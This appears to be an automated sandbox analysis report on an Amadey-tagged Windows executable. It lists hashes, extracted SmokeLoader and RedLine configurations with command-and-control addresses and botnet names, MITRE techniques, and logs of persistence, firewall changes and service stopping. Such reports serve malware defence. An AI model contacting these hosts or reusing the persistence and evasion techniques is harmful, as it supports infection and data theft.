amadey | 0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875

Analysis

max time kernel
47s
max time network
159s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
03/11/2023, 04:49 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe
Size

892KB
MD5

6784b3fa2f1adf00bfb44857f7af4e7c
SHA1

34a8fede342f966c7e12624188725ebf87a6470e
SHA256

0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875
SHA512

e78fc63a81e25e1d5f64609ab8f351c071fe34da1ac23caab6e9dcc6295853749b7190c46e33adc2fe03d5c47da798e4e142f05474d7731c9e431cea5f4243a7
SSDEEP

12288:FrB5FeYmdYPenb2U7vqx0T+vFEnrv9TpxfoxhOuuSVKmd6lv:lMY+YPenb2U7vqevnrvPFkf

Malware Config

Extracted

Family

smokeloader

Version

2022

http://77.91.68.29/fks/

rc4.i32

1
0x4b3b02b6

rc4.i32

1
0x6ea683ed

Extracted

Family

redline

Botnet

plost

77.91.124.86:19084

Extracted

Family

redline

Botnet

kedru

77.91.124.86:19084

Extracted

Family

redline

Botnet

pixelnew2.0

194.49.94.11:80

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

smokeloader

Botnet

up3

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Detected google phishing page
phishing google
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral1/memory/6016-1052-0x0000000002D20000-0x000000000360B000-memory.dmp	family_glupteba
behavioral1/memory/6016-1057-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 13 IoCs

resource	yara_rule
behavioral1/files/0x000800000001abe9-53.dat	family_redline
behavioral1/files/0x000800000001abe9-58.dat	family_redline
behavioral1/memory/4468-64-0x00000000002F0000-0x000000000032C000-memory.dmp	family_redline
behavioral1/memory/2004-82-0x00000000004E0000-0x000000000051C000-memory.dmp	family_redline
behavioral1/files/0x000600000001abea-73.dat	family_redline
behavioral1/files/0x000600000001abea-72.dat	family_redline
behavioral1/memory/5484-642-0x0000000000800000-0x000000000085A000-memory.dmp	family_redline
behavioral1/files/0x000700000001acee-671.dat	family_redline
behavioral1/memory/6072-672-0x00000000005C0000-0x00000000005FE000-memory.dmp	family_redline
behavioral1/files/0x000700000001acee-679.dat	family_redline
behavioral1/memory/5932-680-0x0000000000650000-0x000000000066E000-memory.dmp	family_redline
behavioral1/memory/5484-801-0x0000000000400000-0x0000000000480000-memory.dmp	family_redline
behavioral1/memory/6072-1029-0x0000000000400000-0x0000000000461000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000700000001acee-671.dat	family_sectoprat
behavioral1/files/0x000700000001acee-679.dat	family_sectoprat
behavioral1/memory/5932-680-0x0000000000650000-0x000000000066E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
5384	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 16 IoCs

pid	Process
5048	F4B0.exe
4132	Do7iI6vf.exe
4252	au6aU0HN.exe
2712	pA9Hb0XB.exe
4476	F733.exe
3132	sj7RY2tO.exe
4468	F84D.exe
4872	1qT84OW3.exe
2004	2kY317Xn.exe
5932	5CC8.exe
5484	35B6.exe
5668	InstallSetup5.exe
1744	toolspub2.exe
6016	31839b57a4f11171d6abc8bbc4451ee4.exe
6028	Broom.exe
5428	kos4.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	F4B0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Do7iI6vf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	au6aU0HN.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	pA9Hb0XB.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	sj7RY2tO.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4204 set thread context of 4684	4204	0ed0316c928504190d336bf90266aa3cdf78ad218df28a41557b1eae8a1ed875.exe	71
PID 4872 set thread context of 2260	4872	1qT84OW3.exe	83

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6984	sc.exe
5296	sc.exe
6460	sc.exe
6912	sc.exe
6880	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2120	2260	WerFault.exe	83
5244	5484	WerFault.exe	102
6228	6072	WerFault.exe	112

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5416	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 45a1b829110eda01	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\epicgames.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = aae4802a110eda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\epicgames.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b02d4629110eda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0929682b110eda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4684	AppLaunch.exe
4684	AppLaunch.exe
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found
3172	Process not Found

Suspicious behavior: MapViewOfSection 17 IoCs

pid	Process
4684	AppLaunch.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
3936	MicrosoftEdgeCP.exe
